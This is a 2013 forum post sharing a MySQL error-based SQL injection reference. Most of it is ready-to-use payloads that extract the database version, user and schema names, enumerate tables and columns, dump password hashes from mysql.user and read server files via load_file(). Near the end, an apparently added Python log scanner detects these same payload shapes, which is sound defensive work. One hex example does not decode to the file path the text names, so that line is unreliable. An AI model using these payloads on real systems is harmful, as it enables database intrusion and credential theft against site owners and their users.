This post was last edited by Nightmare on 2013-3-17 14:20
MySQL error-based injection reference (pdf), one post a day...
MySql Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; works on the vast majority of 5.x versions.
A small number of versions throw an error when name_const() is used; for those, test with the Method.2 given below.
Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group by a)b)
Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n with successive values.
Number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=mysql
Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=mysql. Replace n with successive values.
Number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with successive values.
Dump contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with successive values.
Dump file contents:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini. Since only 64 bytes can be dumped at a time, use substring() to control which bytes are displayed.
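As an added defender-side example (not part of the original post or the author's material), the Python below scans web access-log lines for the payload shapes listed in this reference: it URL-decodes the query string (the `+` spaces used above), decodes MySQL hex literals such as 0x6D7973716C back to text, and flags the floor(rand(0)*2) ... group by construct, name_const(), information_schema enumeration and load_file(). The log format and the sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the payload shapes in this reference: the
# floor(rand(0)*2) + GROUP BY duplicate-key trick, the name_const() trick,
# information_schema enumeration and load_file() reads.
INDICATORS = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?group\s+by", re.I | re.S),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(tables|columns|schemata)\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
}
HEX_LITERAL = re.compile(r"\b0x(?:[0-9a-fA-F]{2})+\b")

def normalize(query_string):
    """URL-decode ('+' and %xx), collapse whitespace and replace MySQL hex
    string literals with their text, so 0x6D7973716C is seen as 'mysql'."""
    text = re.sub(r"\s+", " ", unquote_plus(query_string))
    return HEX_LITERAL.sub(
        lambda m: "'" + bytes.fromhex(m.group(0)[2:]).decode("latin-1") + "'", text)

def scan(log_line):
    """Return the names of the indicators that fire on one access-log line.
    Assumed (constructed) format: <ip> - - "<METHOD> <path>?<query> HTTP/1.1" <status>"""
    m = re.search(r'"(?:GET|POST) [^ ?"]*\?([^ "]*)', log_line)
    if not m:
        return []
    text = normalize(m.group(1))
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_log(lines):
    """Map line index -> fired indicators, for lines that matched anything."""
    results = ((i, scan(line)) for i, line in enumerate(lines))
    return {i: found for i, found in results if found}

# Constructed sample lines: one benign request, then two requests carrying the
# Method.2 (floor/rand) and Method.1 (name_const) shapes from this reference.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /item.php?id=7 HTTP/1.1" 200',
    '10.0.0.9 - - "GET /item.php?id=7+and+(select+1+from(select+count(*),'
    'concat(floor(rand(0)*2),version())x+from+information_schema.tables'
    '+group+by+x)a) HTTP/1.1" 500',
    '10.0.0.9 - - "GET /item.php?id=7+and+exists(select*from(select+name_const'
    '(@@version,0))a) HTTP/1.1" 500',
]
```

Running `scan_log(SAMPLE_LOG)` flags lines 1 and 2 with the matching indicator names; the benign first line produces no hit.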
Thx for reading.
No need to download it either,